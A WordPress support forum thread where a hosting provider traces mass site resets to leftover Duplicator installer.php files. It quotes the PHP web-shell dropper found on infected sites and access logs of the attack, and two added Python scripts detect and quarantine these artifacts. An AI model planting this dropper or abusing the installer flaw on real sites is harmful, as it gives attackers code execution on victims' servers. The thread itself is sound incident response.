Support » Fixing WordPress » wp-config.php goes missing – for a lot of customers

  • dennishermannsen

    (@dennishermannsen)



    Hi,

    The last couple of hours, our support has been targeted with A LOT of emails that all revolve around the same issue; a customer’s WordPress website suddenly displays the installation process.

It all seems very related to CVE-2018-12895, but this should’ve been fixed in 4.9.7, and we have customers affected by this that run the latest version of WordPress.

    We’ve had multiple reports the entire day, across multiple hosting companies in multiple datacenters with very different setups.

    Is there an exploit I don’t know about?

    Edit:
    For all infected versions, we see a file called wp-crawl.php in the WP-root. Contents:

    
    <?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl'); ?>
    
Viewing 9 replies - 1 through 9 (of 9 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Support Team Volunteer

    te_taipo

    (@te_taipo)

    Any common 3rd party plugins? Reason is I am currently watching the development of what looks like an attack vector against a file manager plugin.

    dennishermannsen

    (@dennishermannsen)

    I haven’t had the time to compare all the plugins across the infected websites. This seems to be the common process:

    xx.xx.xx.xx - - [06/Sep/2018:18:54:44 +0200] "GET / HTTP/1.1" 200 25833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "POST /installer.php HTTP/1.1" 200 309 "[deleted].com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "POST /installer-backup.php HTTP/1.1" 200 309 "[deleted].com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET /wp-config.php HTTP/1.1" 500 204 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:45 +0200] "GET /wp-admin/setup-config.php HTTP/1.1" 200 4055 "http://[deleted].com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:46 +0200] "GET /wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
    xx.xx.xx.xx - - [06/Sep/2018:18:54:47 +0200] "GET /wp-content/uploads/wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
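Added example (not code from the original poster): the request sequence shown in the log above, turned into detection logic that runs over sample lines modelled on that excerpt. It groups requests per client, flags a successful POST to installer.php or installer-backup.php followed by a 200 on wp-admin/setup-config.php (the site has fallen back to the install screen), and decodes the `q` parameter of wp-crawl.php requests the same way the dropper quoted in the first post does (base64, prefixed with `<?php `), so the analyst sees what was executed. The IP 203.0.113.10, the host example.com and the shortened user agent are placeholders; the log lines are constructed from the thread's excerpt.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the access-log excerpt posted in this thread with the
# masked IP replaced by 203.0.113.10, the site by example.com and the user
# agent shortened, plus one unrelated request from a second client.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Sep/2018:18:54:44 +0200] "GET / HTTP/1.1" 200 25833 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:45 +0200] "POST /installer.php HTTP/1.1" 200 309 "example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:45 +0200] "POST /installer-backup.php HTTP/1.1" 200 309 "example.com/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:45 +0200] "GET /wp-config.php HTTP/1.1" 500 204 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:45 +0200] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:45 +0200] "GET /wp-admin/setup-config.php HTTP/1.1" 200 4055 "http://example.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:46 +0200] "GET /wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
203.0.113.10 - - [06/Sep/2018:18:54:47 +0200] "GET /wp-content/uploads/wp-crawl.php?q=ZWNobyAiYmFyYmllZGVuIjs= HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/36.0.1985.143"
198.51.100.7 - - [06/Sep/2018:18:55:01 +0200] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "curl/7.58.0"
"""

# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

INSTALLER_PATHS = {"/installer.php", "/installer-backup.php"}  # Duplicator leftovers
SETUP_PATH = "/wp-admin/setup-config.php"                     # WordPress install screen
SHELL_NAME = "wp-crawl.php"                                    # dropper from the first post


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["status"] = int(fields["status"])
    fields["path"] = urlsplit(fields["target"]).path
    return fields


def decode_shell_query(target):
    """Recover the PHP the dropper would run from a wp-crawl.php request target.

    The dropper writes '<?php ' . base64_decode($_REQUEST['q']) to a file and
    includes it, so the decoded 'q' value is exactly the injected code.
    Returns None for requests that are not aimed at the dropper.
    """
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != SHELL_NAME:
        return None
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key != "q":
            continue
        # The log holds the raw request line; unquote() rather than parse_qs()
        # so a literal '+' (part of the base64 alphabet) is not turned into a space.
        try:
            return base64.b64decode(unquote(value), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError
            return "<undecodable base64: %s>" % value
    return None


def find_attack_chains(lines):
    """Group requests by client IP and collect the indicators seen in this thread.

    Returns {ip: {"installer_posts": [...], "reset_observed": bool, "shell_hits": [(path, code)]}}
    for every client that touched an installer or the dropper.
    """
    chains = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        c = chains.setdefault(ev["ip"], {"installer_posts": [], "reset_observed": False, "shell_hits": []})
        if ev["method"] == "POST" and ev["path"] in INSTALLER_PATHS and ev["status"] == 200:
            c["installer_posts"].append(ev["path"])
        if ev["path"] == SETUP_PATH and ev["status"] == 200:
            c["reset_observed"] = True
        payload = decode_shell_query(ev["target"])
        if payload is not None:
            c["shell_hits"].append((ev["path"], payload))
    return {ip: c for ip, c in chains.items() if c["installer_posts"] or c["shell_hits"]}


def severity(chain):
    """One-line verdict for a chain returned by find_attack_chains()."""
    if chain["installer_posts"] and chain["reset_observed"]:
        return "installer abused, site reset"
    if chain["shell_hits"]:
        return "dropper executed"
    return "installer probed"


if __name__ == "__main__":
    for ip, chain in find_attack_chains(SAMPLE_LOG.splitlines()).items():
        print(ip, "->", severity(chain))
        for path, code in chain["shell_hits"]:
            print("   ", path, "ran:", code)
```

On the sample, the client 203.0.113.10 is reported as "installer abused, site reset" and both wp-crawl.php hits decode to `echo "barbieden";`, a harmless marker the attacker used to confirm the dropper works; the curl request from the second client is dropped. Pipe a real access log in via `find_attack_chains(open(path))` and look further back than the first installer POST, as te_taipo notes below, because this only shows the attacker using files that were already on disk.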
    dennishermannsen

    (@dennishermannsen)

    Oh damn.. The installer.php seems to be a Duplicator file. Same procedure for _every_ single infected website.
    Not sure if it’s really Duplicator code inside of it. Shit, it is.

    Can anyone possibly confirm whether or not they have duplicator installed and have been targeted?

    te_taipo

    (@te_taipo)

    You will have to go back further in the logs to see how installer.php and other non-WP files were installed. This log is the attacker utilising already uploaded attack files.

    But since you may have the ability to query a few users who have this issue, working out which 3rd party plugins they have in common will narrow this down, in particular if they have a plugin in common that handles file managing (for example)

    dennishermannsen

    (@dennishermannsen)

    https://db.threatpress.com/vulnerability/duplicator/wordpress-duplicator-plugin-1-2-40-arbitrary-code-execution-vulnerability

    It really is Duplicator.
    All the infected installations have Duplicator installed, and the installer.php file is often very old.

    te_taipo

    (@te_taipo)

    What version of Duplicator was installed?

    dennishermannsen

    (@dennishermannsen)

    Duplicator doesn’t have to be installed. Previous versions of Duplicator didn’t remove the installer.php file, and this file could be exploited.

    I’m not sure whether or not upgrading to the latest version of Duplicator would remove the file. We just made a script that grepped for a certain string in all installer.php files and deleted them.
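Added example (not the poster's cleanup script): a triage pass over a WordPress root that flags the artifacts named in this thread, both by file name and by content, and quarantines them instead of deleting them so the evidence survives. The content signature for the dropper is taken from the wp-crawl.php one-liner quoted in the first post, which also catches copies of it planted under other names, so it goes a little beyond the specific case above. The string "Duplicator" used to recognise an installer by content is an assumption; the thread does not say which string the poster grepped for, so replace it with one taken from a known copy of the installer.

```python
import os
import re
import shutil

# Content signature taken from the wp-crawl.php dropper quoted in this thread.
DROPPER_RE = re.compile(r"file_put_contents\(\s*['\"]tempcrawl['\"]")
# Names this thread ties to the incident: the leftover Duplicator installer
# files that were abused and the dropper that was planted afterwards.
INSTALLER_NAMES = {"installer.php", "installer-backup.php"}
DROPPER_NAME = "wp-crawl.php"
# Assumption: a Duplicator installer mentions "Duplicator" in its source. The
# thread does not name the string the poster's script grepped for; this is a
# stand-in to be replaced with a marker taken from a known installer copy.
DUPLICATOR_MARKER = "Duplicator"
MAX_BYTES = 4 * 1024 * 1024  # do not read huge files into memory


def classify(relpath, content):
    """Return the indicator tags that apply to one file (empty list if clean)."""
    name = os.path.basename(relpath)
    tags = []
    if name == DROPPER_NAME or DROPPER_RE.search(content):
        tags.append("dropper")
    if name in INSTALLER_NAMES:
        # A Duplicator installer is the entry point; an unrelated file with the
        # same name still deserves a manual look rather than silent deletion.
        tags.append("duplicator-installer" if DUPLICATOR_MARKER in content else "installer-name-only")
    if name == "tempcrawl":
        # The dropper unlinks this after include(); it survives when the
        # injected payload aborted before the unlink ran.
        tags.append("dropper-temp-file")
    return tags


def triage_files(files):
    """files: {relative path: content}. Returns {relative path: tags} for hits only."""
    hits = {}
    for relpath, content in files.items():
        tags = classify(relpath, content)
        if tags:
            hits[relpath] = tags
    return hits


def triage_dir(root):
    """Walk a WordPress root, read every .php file and any 'tempcrawl' leftover,
    and return {relative path: tags} for the files that match an indicator."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not (name.endswith(".php") or name == "tempcrawl"):
                continue
            full = os.path.join(dirpath, name)
            try:
                if os.path.getsize(full) > MAX_BYTES:
                    continue
                with open(full, "r", encoding="utf-8", errors="replace") as fh:
                    content = fh.read()
            except OSError:
                continue
            files[os.path.relpath(full, root)] = content
    return triage_files(files)


def quarantine(root, hits, dest):
    """Move each flagged file under `dest`, keeping its relative path, instead
    of deleting it, so the incident record keeps the original artifacts."""
    moved = []
    for relpath in hits:
        target = os.path.join(dest, relpath)
        os.makedirs(os.path.dirname(target), exist_ok=True)
        shutil.move(os.path.join(root, relpath), target)
        moved.append(relpath)
    return moved


if __name__ == "__main__":
    import sys
    site = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, tags in sorted(triage_dir(site).items()):
        print(path, ",".join(tags))
```

Run it as `python triage.py /var/www/example` and review the list before calling `quarantine(site, hits, "/root/ir/example")`; removing installer.php closes the entry point, but the dropper can sit anywhere under the web root (the log above shows a second copy under wp-content/uploads), which is why the scan walks the whole tree and matches on content as well as name.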

    te_taipo

    (@te_taipo)

    That makes sense.
